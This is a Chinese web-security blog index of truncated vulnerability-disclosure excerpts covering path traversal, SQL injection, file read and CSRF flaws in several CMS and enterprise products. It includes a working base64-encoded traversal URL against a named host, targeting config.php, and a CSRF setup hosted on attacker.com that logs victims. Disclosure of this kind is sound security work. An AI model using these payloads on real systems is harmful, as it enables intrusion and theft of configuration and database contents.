起风了

“路海长 青夜旷 越过群山追斜阳”

FengCMS任意文件下载绕过第二发(系统特性未考虑

你给的测试站点,看源码你是过滤../但是你忘了window支持..\ http://guf521656.h163.92hezu.org/index.php?controller=down&file=L3VwbG9hZC9cLi5cY29uZmlnLnBocA==       修复方案: 直接过滤/和\就行了 上一篇: 用友人力资源管理软件(e-HR)另一处SQL注入漏洞 下一...

TurboMail邮件系统任意文件读取漏洞(需管理权限

TurboMail邮件系统处理日志文件时未对文件路径进行判断,导致可读取服务器上的任意文件。 邮件后台管理进行“WEB日志查看”时存在任意文件读取漏洞。 漏洞代码位于TomcatLogAjax.class,其中getLog函数读取web服务器日志文件的源代码实现如下: publicstatic void getLog(HttpServletRequest request, Htt...

用友人力资源管理软件(e-HR)另一处SQL注入漏洞

上一个注入由于不清楚到底是啥版本,只能让厂商自己去查了,赶脚挺愧疚的。 这次终于不用纠结版本问题了,因为通杀。。。 1.漏洞出在[重置密码]功能这,密码找回输入用户处由于未进行过滤导致SQL注入漏洞。 2.漏洞文件http://x.x.x.x/hrss/rm/ResetPwd.jsp?       3. 抓包...

74cms (20140709) 二枚二次注入 – 网站安全 – 自学ph

不好好的通过修改造成漏洞的代码 而是通过修改过滤函数。 现在的过滤函数, 虽然我是绕不过去了。 但是还是能找到几处能出数据的。 之前未通过,这次两个打个包来。 P.S:这很不好意思 之前测试demo的时候 因为有个是个update的点 忘记加where限制条件了 导致给某处全部都出数据了。。。。。 不只应该修改过...

PHPMyWind后台管理界面的SQL注入漏洞 – 网站安全

后台管理界面因为过滤不严格导致SQL注入漏洞,可以使权限较低的管理员取得较高权限,以及获取并修改超级管理员的用户名密码。 存在问题的代码,admin_save.php 59-101行,SQL语句中的$id存在注入   else if($action == 'update') { //创始人账号不允许更改状态 if($id == 1 and ($checkadmin !=...

FengCMS的CSRF漏洞可导致数据库被dump – 网站安全

重要功能未进行csrf token验证导致可被脱裤 详细说明: 后台管理中的数据备份功能未进行csrf token验证。 攻击者制作内容如下的csrf.php并放到attacker.com下面: <?phpfile_put_contents("test.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_contents("test.txt", " Time:".date("...

易思ESPCMS sql注入(demo成功) – 网站安全 – 自学

rtV6.0.14.07.07 UTF8 详细说明: 看了大牛们提交的 WooYun: ESPCMS最新 V5.8.14.03.03 UTF8 正式版暴力注入 下了最新版来看看,发现 加密函数 还是老样子啊- - 不过 ,查询换成 了 id 而不是 username了, 但是 id 是 intval的。 function member_cookieview($keyword = false) {$retrunstr = array();$...

74cms (20140709) 9枚注入打个包 – 网站安全 – 自学p

不好好修改漏洞代码 而是修改过滤函数 虽然你们这过滤函数我绕不过。 但是过滤的还不是很完善, 还能出数据。 还是在修改过滤函数的同时好好修改下产生漏洞的代码把。 详细说明: 看过滤函数 function remove_xss($string) { $string = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $str...